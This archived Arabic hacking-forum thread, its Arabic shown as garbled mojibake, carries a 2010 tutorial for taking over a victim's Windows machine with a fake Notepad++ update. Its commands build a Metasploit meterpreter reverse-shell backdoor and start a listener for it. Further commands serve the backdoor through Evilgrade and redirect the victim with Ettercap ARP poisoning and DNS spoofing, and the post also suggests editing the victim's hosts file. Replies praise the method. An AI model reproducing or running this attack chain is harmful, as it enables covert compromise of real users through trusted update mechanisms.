:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   MetaSploit (http://www.vbspiders.com/vb/f196.html)
-   -   ÇÎÊÑÇÞ äÙÇã æíäÏæÒ Úä ØÑíÞ ÊÍÏíË ãáÛã (http://www.vbspiders.com/vb/t23839.html)

MATRIX ALGERIA 01-15-2010 07:50 PM

ÇÎÊÑÇÞ äÙÇã æíäÏæÒ Úä ØÑíÞ ÊÍÏíË ãáÛã
 
ÈÓã Çááå ÇáÑÍãÇä ÇáÑÍíã
Çáíæã
ÓäÞæã Ýí åÐÇ ÇáÇÎÊÑÇÞ ÈÚãá ÊÍÏíË æåãí æÇÑÓÇáå Çáì ÈÑäÇãÌ Úáì ÌåÇÒ ÇáÖÍíÉ
ÇáÈÑÇãÌ ÇáÊì íãßä ÊÒííÝ ÊÍÏíËÇÊåÇ:
·sunjava
·winzip
·winamp
·itunes
·speedbit
·openoffice
·linkedin
·osx
·notepadplus
·dap
Ýí åÐÇ ÇáÔÑÍ ÓäÓÊÎÏã ÈÑäÇãÌ notepad++
æ ÓÊßæä ØÑíÞÉ ÇáÚãá ßÇáÇÊí :
1.äÞæã ÈÊßæíä Backdoor ÈÇÓÊÎÏÇã ãÔÑæÚ ãíÊÇÓÈáæíÊ ÈÇáÎíÇÑÇÊ ÇáÊí ÊäÇÓÈäÇ.
2.ÇÓÊÎÏÇã ãÔÑæÚ Evilgrade ÇáÐí ÓíÞæã ÈÊÔÛíá Web Server íÍÊæí Úáì ÊÍÏíË ãÒíøÝ áÈÑäÇãÌ Notepad++.
3.ÇÓÊÎÏÇã ÈÑäÇãÌ Ettercap áÚãá dns spoofing æ ÈÇáÊÇáí ÊÍæíá Ãí ØáÈ ãÑÓá áãæÞÚ Notepad++ Çáì ÇáæíÈ ÓíÑÝÑ ÇáÐí ÞÇã Evilgrade ÈÊÔÛíáå.(ÇÐÇ ßäÇ ãÊÕáíä ÈÇáÖÍíÉ Úä ØÑíÞ ÇáÔÈßÉ ÇáãÍáíÉ)
æ ÇÐÇ ßäÇ ãÊÕáíä ÈåÇ Úä ØÑíÞ ÇáÇäÊÑäÊ ÝÚáíäÇ ÊÛííÑ ãáÝ hosts
ÇáãæÌæÏ ÈãÓÇÑC:\Windows\System32\drivers\etc
Úáì ÌåÇÒ ÇáÖÍíÉ (ÓäÊØÑÞ Çáì åÐÇ áÇÍÞÇ)
áäÈÏÁ ÇáÔÑÍ (ÓÇÓÊÎÏã äÙÇã áíäßÓ Ýí ÇáÔÑÍ )
äÝÊÍ Ôíá æäßÊÈ ÇáÇãÑ
/metasploit/msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port X > agent.exe
ÍíË
Metasploit: ãÓÇÑ ÈÑäÇãÌ ãíÊÇÓÈáæíÊ
Reverse_tcp:áÇÎÊíÇÑ ÇáÇÊÕÇá ÇáÚßÓí
ip:ÇíÈí ÌåÇÒß
PORT:ÇáÈæÑÊ
Agent.exe:ÇÓã ÇáÈÇßÏæÑ (ÇÊÑßå ßãÇ åæ)
ÇáÇä ßæääÇ ÇáÈÇß ÏæÑ äÞæã ÈäÞáå Çáì ÈÑäÇãÌ evilgrade
ÈÇáÇãÑ:
cp agent.exe /pentest/evilgrade/agent
ÍíË pentest åæ ãÓÇÑ ÇáÈÑäÇãÌ
ÓíÓÆáß ÇÐÇ ßäÊ ÊÑíÏ ÇÓÊÈÏÇá ÇáÈÇßÏæÑ ÈÇáÈÇßÏæÑ ÇáÐí íÇÊí ãÚ ÇáÈÑäÇãÌ ÇÌÈ ÈäÚã
ÇáÇä äÞæã ÈÇáÊäÕÊ Úáì ÇáÈæÑÊ ÇáÐí ÇÎÊÑäÇå ÈÇáÇãÑ
/metasploit/msfconsole
ÍíË
Metasploit: ãÓÇÑ ÈÑäÇãÌ ãíÊÇÓÈáæíÊ
Use exploit/multi/handler
set LHOST=ip
ip:ÇíÈí ÌåÇÒß
set LPORT=port
PORT:ÇáÈæÑÊ
set payload windows/meterpreter/reverse_tcp
exploit
Êã ÇáÊäÕÊ ÇáÇä äÔÛá evilgrade
äÝÊÍ Ôíá ÌÏíÏ æ äßÊÈ
Cd /pentest/evilgrade
./evilgrade
Conf notepadplus
Show option
ÇáÇä äÓÌá ÞíãÉ Çá virtual host æ åí notepad-plus.sourceforge.net
Ðáß åæ ÇáÏæãíä ÇáÐí ÓäÓÊÚãáå Ëã äÔÛá ÇáÓíÑÝÑ ÈÇáÇãÑ
Start
ßá ÔíÆ ÊãÇã ãÇÚáíäÇ ÇáÇä Çáì Úãá Çá Ïí Ç äÇÓ ÓÈæÝíäÞ

äÝÊÍ Ôíá ÌÏíÏ äÍæá ÕáÇÍíÊäÇ Çáì ÑææÊ
Su root
äÝÚá ip forwarding :
Echo 1 > proc/sys/net/ipv4/ip_forward
äÝÊÍ etter.dns
Nano /usr/ettercap/etter.dns
ÍíË usr : ãÓÇÑ ÇáÈÑäÇãÌ
äÛííÑ www.microsoft.com Çáì notepad-plus.sourceforge.net
æ ÇáÇíÈí ÇáãÞÇÈá Çáì ÇíÈí ÌåÇÒäÇ äÍÝÙ ÇáÊÛííÑÇÊ æ äÎÑÌ
äßÊÈ ÇáÇãÑ
// Ettercap –T –q –M arp:remote –P dns_spoof –i eth0
ÍíË eth0åæ Çá interface
Êã ÇáÇãÑ ÇáÇä ÍíäãÇ ÊÝÊÍ ÇáÖÍíÉ ÈÑäÇãÌ notepadplus ÓÊÝÊÍ áå äÇÝÐÉ ÊÎÈÑå ÈæÌæÏ ÊÍÏíËÇÊ æÍíäãÇ íæÇÝÞ Úáì ÇáÊÍÏíË ÓíÊã ÊäÒíá ÇáÈÇßÏæÑ æ ÊÔÛíáå Úáì ÌåÇÒ ÇáÖÍíÉ æhttp://www.vbhacker.net/vb/images/smilies/0091.gif Úáíß ÇáÇÎÊÑÇÞ
åÐÇ ÈÇáäÓÈÉ ááæßÇá æÈÇáäÓÈÉ ááÇäÊÑäÊ ÇáÍá åæ ÇÖÇÝÉ ÇáÏæãíä æÇá ÇíÈí Çáì ãáÝ hosts

Ëã ÇÓÊÈÏÇáå Ýí ÌåÇÒ ÇáÖÍíÉ (ãä ÇáÇÝÖá ÇáÇßÊÝÇÁ ÈåÐÇ ÇáÇÎÊÑÇÞ Ýí ÇáÔÈßÇÊ ÇáãÍáíÉ)
ÊÍãíá : http://www.infobyte.com.ar/developments.htmlevilgrade
ÊÍãíá : http://www.ettercap.sourceforge.net ettercap
ÊÍãíá :http://www.metasploit.com metasploit


ãäÞæá : )

ThE BiGeSt JoKeR 01-16-2010 05:51 PM

ÌíÏ ÇÎí .. ØÑíÞå Ðßíå ..

ÔßÑÇ áß Úáì äÞáß ^_^

punisher77 02-05-2010 06:32 AM

salut
 
ãÔßæÑ ãæÖæÚ ÌíÏ æ áßä ÈÎÕæÕ ÈÑäÇãÌ evilgrade áã ÇäÌÍ Ýí ÊäÕíÈå

blablabou94 02-13-2010 05:37 PM

ÅÐÇßäÊ ÊÑíÏ Ãä íßæä ãæÖæÚß ÑæÚÉ ÃÚãá ÊÓÌíá ÇãÊÚ ÝíÏíæ ÃÚÒ ÔíÁ íÇ ÃÎí æ ÊÓåá ÇáÊÝÓíÑ áí æ ááÇÎÑíä æÇááå ....äÕíÍÉ áí Åäí áã ÃÝåã ãä ÇáãÑÍáÉ ÇáÃæáì
ÔÜßÜÜ æÈÇÑß Çááå Ýíß ÜÜÜÑÇ áß ... áß ãäí ÃÌãá ÊÍíÉ .


ÇáÓÇÚÉ ÇáÂä 11:15 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0